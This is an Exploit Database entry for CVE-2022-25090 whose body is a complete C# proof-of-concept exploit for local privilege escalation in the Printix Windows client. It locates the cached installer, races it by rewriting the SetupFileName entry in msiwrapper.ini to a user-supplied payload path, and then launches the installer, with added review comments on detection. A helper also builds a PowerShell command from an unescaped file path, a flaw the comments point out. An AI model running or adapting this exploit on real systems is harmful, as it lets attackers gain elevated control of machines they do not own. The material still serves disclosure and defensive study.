
CVE-2022-25090: Offensive Security’s Exploit Database Archive

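Printix Secure Cloud Print Management through 1.3.1106.0 creates a temporary temp.ini file in a directory with insecure permissions, leading to privilege escalation because of a race condition. The proof of concept below exercises that window by rewriting the `SetupFileName` entry of an `msiwrapper.ini` file under the current user's `AppData\Local\Temp` while the cached Printix installer runs. Defenders can monitor for writes to that file by any process other than the installer and move off the affected client versions.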

# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
# Date: 3/2/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25090
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090

using System;
using System.Runtime.InteropServices;
using System.Drawing;

using System.Reflection;
using System.Threading;
using System.IO;
using System.Text;
using System.Resources;
using System.Diagnostics;

//Assembly COM for transparent creation of the application.

//End of Assembly COM For Transparent Creation usage.
/// <summary>
/// Proof-of-concept console program for CVE-2022-25090 (Printix Client, affected through
/// 1.3.1106.0 according to the exploit header of this file).
/// </summary>
/// <remarks>
/// Flow visible in this class: (1) locate a cached MSI under C:\windows\installer whose
/// Author property contains "Printix", (2) start a thread that polls the current user's
/// Temp directory for msiwrapper.ini and rewrites its SetupFileName line to the path given
/// in args[0], (3) launch the cached MSI.
/// NOTE(review): nothing in this class elevates privileges itself; any privilege gain would
/// come from the installer acting on the rewritten SetupFileName entry - installer behaviour
/// is not shown here, confirm against the vendor advisory.
/// Defender view: the observable artefacts are one CMD.exe/PowerShell child pair per cached
/// *.msi file, followed by repeated recursive scans of the user's Temp directory and a write
/// to msiwrapper.ini by a process that is not the installer.
/// </remarks>
public class Program
{
    /// <summary>
    /// Entry point: prints a banner, checks that a file path was supplied, searches the
    /// Windows Installer cache for the Printix package, then starts the Temp-directory
    /// watcher thread and launches the cached package.
    /// </summary>
    /// <param name="args">
    /// args[0] is the path written into the SetupFileName entry. It is only echoed here;
    /// this method does not check that the file exists.
    /// </param>
    public static void Main(string[] args)
    {
        //Console.SetWindowSize(120,30);
        //Console.SetBufferSize(120,30);
        // Banner output only; the colour changes have no effect on the logic below.
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Console.WriteLine("├              oo dP                           dP                                ");
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("├                 88                           88                                ");
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine("├              dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.WriteLine("├              88 88'  `88 88'  `88    .d8P'   88   88ooood8 88'`88'`88 88'  `88 ");
        Console.ForegroundColor = ConsoleColor.Yellow;
        Console.WriteLine("├              88 88    88 88.  .88  .Y8P      88   88.  ... 88  88  88 88.  .88 ");
        Console.ForegroundColor = ConsoleColor.Magenta;
        Console.WriteLine("├              dP dP    dP `88888P8 d888888P   dP   `88888P' dP  dP  dP 88Y888P' ");
        Console.WriteLine("├                                                                       88       ");
        Console.WriteLine("├                                                                       dP       ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write("├                                    For ");
        Console.ForegroundColor = ConsoleColor.Magenta;
        Console.Write("Printix ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write("Services                       Designed By Logan Latvala\n");
        Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Thread.Sleep(3000);
        // Passed by value to the watcher thread, which keeps its own copy; this variable stays empty.
        string filesH = "";
        Console.WriteLine("Drag and drop a payload onto this application for execution.");
        try
        {
            // With no command-line argument, indexing args[0] throws and control moves to the catch block.
            if (args[0]?.Length >0)
            {
                Console.WriteLine("File Added: " + args[0]);
            }
            
        }
        catch (Exception e)
        {
            // Missing argument: print the exception, wait for Enter, then exit with code 40.
            Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine(e);
            Console.ReadLine();
            Environment.Exit(40);
        }


        Console.WriteLine("\n We're going to look for your printix installer, one moment...");
        // Recursive listing of every cached *.msi in the Windows Installer directory.
        string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);

        // 1-based progress counter, kept as a double so the percentage division below is not integer division.
        double mCheck = 1.00;

        string trueInstaller = "";
        // Check each cached MSI's Author property for "Printix"; every check spawns a
        // CMD.exe/PowerShell process (see readFileProperties).
        foreach (string path in installerSearch)
        {
            Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
            Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
            if (readFileProperties(path, "Printix"))
            {
                trueInstaller = path;
                Console.WriteLine("We've found your installer, we'll finish enumeration.");
                // The first match wins; the jump leaves the loop early.
                goto MGMA;
            }
            mCheck++;
        }
    // Jump target used to leave the search loop; also reached normally when the loop ends without a match.
    MGMA:
        if (trueInstaller == "")
        {
            // NOTE(review): this message only means no cached MSI with a matching Author was found.
            // No version check is performed anywhere in this file, so it is not evidence about patch level.
            Console.WriteLine("We can't find your installer, you are not vulnerable.");
            Thread.Sleep(2000);
            Environment.Exit(12);
        }
        Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Console.WriteLine("├ We are starting to enumerate your temporary directory.");
        Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");

        // The watcher thread is started before the installer so both run concurrently.
        // It is never signalled to stop: newTempThread loops forever.

        Thread t = new Thread(() => newTempThread(filesH, args));
        t.Start();



        // Launch the cached installer package; the call is not followed by WaitForExit.
        Process.Start(trueInstaller);



        // Printed immediately after the launch, not after the installer completes.
        Console.WriteLine("All done.");
        Console.ReadLine();
    }
    /// <summary>
    /// Polls the current user's Temp directory every 20 ms for files named msiwrapper.ini
    /// and, in each one not yet handled, replaces every line containing "SetupFileName"
    /// with SetupFileName="args[0]" and writes the file back.
    /// </summary>
    /// <param name="filesH">
    /// Space-separated list of paths already rewritten. It is a by-value string, so the
    /// appends below change only this method's copy, which persists across loop iterations.
    /// </param>
    /// <param name="args">Command-line arguments; args[0] is the replacement path.</param>
    /// <remarks>
    /// Never returns. Any exception is printed and the loop then blocks on Console.ReadLine
    /// until Enter is pressed.
    /// Defender view: the rewrite shows up as a truncate-then-write of msiwrapper.ini under
    /// C:\Users\(user)\AppData\Local\Temp by this process rather than by the installer.
    /// </remarks>
    public static void newTempThread(string filesH, string[] args)
    {
        while (true)
        {
            try
            {
                // Recursive search of the Temp directory, built from Environment.UserName rather than from an environment path.
                string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
                if (!string.IsNullOrEmpty(files[0]))
                {
                    foreach (string fl in files)
                    {
                        // Skip files whose path was already recorded in filesH.
                        if (!filesH.Contains(fl))
                        {

                            //filesH += " " + fl;
                            string[] fileText = File.ReadAllLines(fl);
                            // Index of the current line within fileText.
                            int linerc = 0;
                            foreach (string liners in fileText)
                            {

                                if (liners.Contains("SetupFileName"))
                                {

                                    // Replace the whole line with a quoted SetupFileName entry pointing at args[0].
                                    Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
                                    Console.WriteLine("├ " + fl);
                                    fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
                                    Console.WriteLine("├ " + fileText[linerc] + "");
                                    Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
                                    Console.WriteLine("│");
                                    // Record the path so later polls skip this file.
                                    filesH += " " + fl;

                                    // Truncate, then write the modified lines back to the same path.
                                    File.WriteAllText(fl, string.Empty);
                                    File.WriteAllLines(fl, fileText);
                                }
                                linerc++;
                            }
                        }
                    }
                }
            }
            catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }

            // Poll interval between scans.
            Thread.Sleep(20);
        }
    }
    /// <summary>
    /// Reports whether the System.Author extended property of <paramref name="file"/>
    /// contains <paramref name="filter"/>. The property is read by running
    /// CMD.exe /c PowerShell with a Shell.Application COM query and capturing its
    /// standard output.
    /// </summary>
    /// <param name="file">Path of the file to inspect; inserted into the PowerShell command text.</param>
    /// <param name="filter">Substring looked for in the command output (case-sensitive Contains).</param>
    /// <returns>true when the captured output contains <paramref name="filter"/>; otherwise false.</returns>
    /// <remarks>
    /// NOTE(review): <paramref name="file"/> is concatenated into a single-quoted PowerShell
    /// string with no escaping, so a path containing a single quote changes the command that
    /// runs. Do not reuse this pattern with paths that are not fully trusted.
    /// The Process object is not disposed, and one child-process pair is created per call.
    /// </remarks>
    public static bool readFileProperties(string file, string filter)
    {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
        // Shell execution is disabled because standard output is redirected and read below.
        startInfo.UseShellExecute = false;
        startInfo.RedirectStandardOutput = true;
        startInfo.FileName = "CMD.exe";
        startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
        process.StartInfo = startInfo;
        process.Start();
        // The output is read to the end before waiting for the child process to exit.
        string output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
        if (output.Contains(filter)) { return true; }
        else { return false; }
        // Leftover note of an alternative lookup; never executed.
        //wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
    }
}
